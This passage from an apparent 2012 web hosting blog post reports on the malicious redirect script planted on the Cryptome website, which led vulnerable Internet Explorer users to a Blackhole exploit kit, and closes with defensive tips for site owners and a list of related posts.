The vulnerable Microsoft Internet Explorer versions were unpatched instances of v6, v7 and v8. The script planted by the hack attack on the web site appears to have been installed on February 8; it was removed by Cryptome on February 12. During that time period, almost 3000 targets were probed, although it is not clear how many of those targets contained the vulnerable versions of IE. The rogue script performed a re-direct on breached browsers to send the visitor to a page which would covertly download a Blackhole exploit kit, a hacking tool that can be activated to send further instances of malware to that target and perhaps use it as a source of further attacks on other targets.
One interesting aspect of the planted script was the presence of a filter that stopped the infected browsers from forming a successful connection to sites that might scan the script and detect it as malware, such as well-protected university sites and Google. Though the origin of the malware has not been firmly established, it appears that the hack began with several out-of-date vulnerable FrontPage extensions that were used by Cryptome developers and webmasters to maintain their site.
Several recommendations were supplied by various anti-malware researchers for website owners and for those who supply resources to website owners. First, status pages used to announce the technical state of the website should contain as little actual data about the site as possible. Second, debugging should always be turned off when the web site is in production status. Third, code modules that are not used in the production side of the web site should be disabled when the web site is opened to public access. On the visitor side, all Internet users should be encouraged to keep both their malware scanning applications and their other software packages patched and up-to-date.
But, besides these small bits of technical advice, the one aspect of this incident that shines through is the volunteer who felt it was his duty to report to the web site owners that something was wrong with their web site. Such warnings should never be ignored.
Kimberly Dovander
Kimberly is the pro blogger in the WHS family. WordPress, Blogger, Tumblr... It doesn't matter - she knows them all. Send her a question, or a drop a line in the comment section below, and she'll get back to you.
-
2012-05-16
A new tactic is being used by fashion companies trying to stop the online sale of counterfeit versions of their trademark luxury products. Up until about ten years, ago, companies like Chanel and Louis Vuitton w...
-
2012-05-10
A recent double release of patches by the PHP Group to remedy a vulnerability in Web servers is symptomatic of a problem that those who are responsible for Web servers know all too well. When a vulnerability is ...
-
2012-05-08
Last month, government takedowns of criminal websites revealed a disturbing trend: the use of e-commerce to sell illegal data. We've all used online shopping carts and clicked the checkout button on many commerc...
-
2012-05-03
The Cyber Information Sharing and Protection Act (CISPA) that was passed by the US House of Representatives last week by a vote of 248 to 168 appears to be the next piece of computer-related legislation that wil...
-
2012-04-26
A recent report on the source and types of application hacking attacks upon Web servers highlights the linked growth of two characteristics, sophistication and automation, for the first few months of 2012. Web a...
-
2012-04-24
The war over copyright infringement between Big Media and Internet Service Providers (ISPs) is not confined solely (of course) to the United States and Europe. Recently, a court battle was won by iiNet Limited, ...
-
2012-04-20
Federal authorities, attempting to trace back three threatening emails that were sent over the last few months to Pennsylvania reporters about bombs supposedly planted at the University of Pittsburgh, found a we...
-
2012-04-17
Anyone who played the game of Hot Potato as a child will instantly understand the current situation of the fees for servers involved in the Megaupload case. Last January, the popular file-sharing web site was se...
-
2012-04-12
Attacks on web servers by hackers is one of those events most feared by web hosting providers. Besides being categorized by the damage done, these events can also be classified by the type of technique used in t...
-
2012-04-03
Several trends have started to coalesce recently into a pattern that augurs well for the growth of cloud computing as a service that can be sold to customers who are already purchasing web hosting services. Clou...
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
